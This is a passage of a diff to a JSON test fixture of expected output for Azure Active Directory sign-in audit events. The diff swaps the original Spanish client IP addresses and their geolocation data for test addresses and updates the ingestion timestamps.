\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -6269,25 +5450,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6301,7 +5464,7 @@ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -6351,7 +5514,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -6363,12 +5526,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051674500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d2bb7eae-bc6e-42d2-b270-a885ec626235\",\"InterSystemsId\":\"9270f20a-56f2-493e-b6a7-a859adcaf626\",\"IntraSystemId\":\"97aa710f-536f-44c8-a8d5-711dc55f5500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970311Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d2bb7eae-bc6e-42d2-b270-a885ec626235\",\"InterSystemsId\":\"9270f20a-56f2-493e-b6a7-a859adcaf626\",\"IntraSystemId\":\"97aa710f-536f-44c8-a8d5-711dc55f5500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -6407,25 +5570,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6439,7 +5584,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -6489,7 +5634,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -6501,12 +5646,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051678200Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"03de6d95-b955-451c-8311-473b6853d774\",\"InterSystemsId\":\"97c52753-c410-438f-89e2-22741e5ccc6a\",\"IntraSystemId\":\"c9ef5d5f-e3af-4669-b465-921d8b58bd00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970314900Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"03de6d95-b955-451c-8311-473b6853d774\",\"InterSystemsId\":\"97c52753-c410-438f-89e2-22741e5ccc6a\",\"IntraSystemId\":\"c9ef5d5f-e3af-4669-b465-921d8b58bd00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -6545,25 +5690,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6577,7 +5704,7 @@ "ObjectId": "00000004-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -6627,7 +5754,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -6639,12 +5766,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051681Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"e48d4214-364e-4731-b2b6-47dabf529218\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59\",\"InterSystemsId\":\"9e0a494b-0db0-4481-a70e-eea6124b7018\",\"IntraSystemId\":\"e7a84bcf-41ff-4953-8e99-fb1820685f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000004-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000004-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970318100Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"e48d4214-364e-4731-b2b6-47dabf529218\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59\",\"InterSystemsId\":\"9e0a494b-0db0-4481-a70e-eea6124b7018\",\"IntraSystemId\":\"e7a84bcf-41ff-4953-8e99-fb1820685f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000004-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000004-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -6683,25 +5810,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6715,7 +5824,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -6765,7 +5874,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -6777,12 +5886,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051683700Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"880fb7bc-5708-42d1-86a8-760c32ac5e6b\",\"InterSystemsId\":\"9fc4af4c-bf19-4f88-92ac-0fd029ca21bd\",\"IntraSystemId\":\"56fa424b-64bd-4ea5-abc4-38256f8a5600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970322400Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"880fb7bc-5708-42d1-86a8-760c32ac5e6b\",\"InterSystemsId\":\"9fc4af4c-bf19-4f88-92ac-0fd029ca21bd\",\"IntraSystemId\":\"56fa424b-64bd-4ea5-abc4-38256f8a5600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -6821,25 +5930,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "79.159.10.151"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -6853,7 +5944,7 @@
 "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Redirect",
@@ -6903,7 +5994,7 @@
 "asr"
 ],
 "ip": [
- "79.159.10.151"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -6915,12 +6006,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "79.159.10.151",
- "ip": "79.159.10.151"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051686600Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"30c7afcc-f74d-4b5a-898e-ce72da9386b8\",\"InterSystemsId\":\"a35e980b-88be-4343-9691-629473e01983\",\"IntraSystemId\":\"78a2aa65-5026-4124-970a-00e06dc7df00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970327900Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"30c7afcc-f74d-4b5a-898e-ce72da9386b8\",\"InterSystemsId\":\"a35e980b-88be-4343-9691-629473e01983\",\"IntraSystemId\":\"78a2aa65-5026-4124-970a-00e06dc7df00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -6959,25 +6050,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -6991,7 +6064,7 @@
 "ObjectId": "00000002-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Success",
@@ -7041,7 +6114,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -7053,12 +6126,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051690300Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-06T09:28:00\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d4f90f07-f5c4-4b36-a81c-6c9bae8660d6\",\"InterSystemsId\":\"a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f\",\"IntraSystemId\":\"bfe22fb6-c763-4972-91a7-5b13d3d51400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
